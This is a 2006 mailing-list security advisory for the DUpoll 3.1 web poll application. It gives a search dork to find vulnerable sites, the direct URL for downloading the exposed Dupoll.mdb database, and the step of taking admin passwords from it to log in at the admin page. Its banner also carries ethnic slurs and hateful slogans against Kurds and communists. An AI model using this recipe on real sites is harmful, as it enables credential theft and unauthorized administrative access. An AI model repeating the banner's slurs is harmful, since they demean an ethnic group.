Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21635] HLstats "q" Cross-Site Scripting Vulnerability

[SA21667] PmWiki Table Markups Script Insertion Vulnerability

[SA21645] MyBB Avatar / Attachment Script Insertion Vulnerability

Ay System Solutions CMS <= v2.6 (main.php) Remote File Inclusion Exploit

From:	...::BoZKuRTSeRDaR::... <bozkurtserdar_(at)_bozkurtserdar.com>
Date:	29.08.2006
Subject:	DUpoll 3.1 security bug

#############################################################################
#DUpoll 3.1 application
bug
                       #
#
                 #
#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet
korsanı                                              #
#
                                            #
#kahrolsun pkk kahrolsun Komünizm fuck kurdish
lamerz                                                  #
#
   #
#Discovered by: BoZKuRTSeRDaR
bozkurtserdar[at]bozkurtserdar[dot]com                         #
#
                        #
#
#
#############################################################################

Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/

Dork/Search for: "Powered by DUpoll"

Exploit :

http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb

database downloading

database users table administratory users and pasword

go dir

http://www.target.com/[DUpollpatch]/admin/default.asp

Security Adivisory | Edithor by BoZKuRTSeRDaR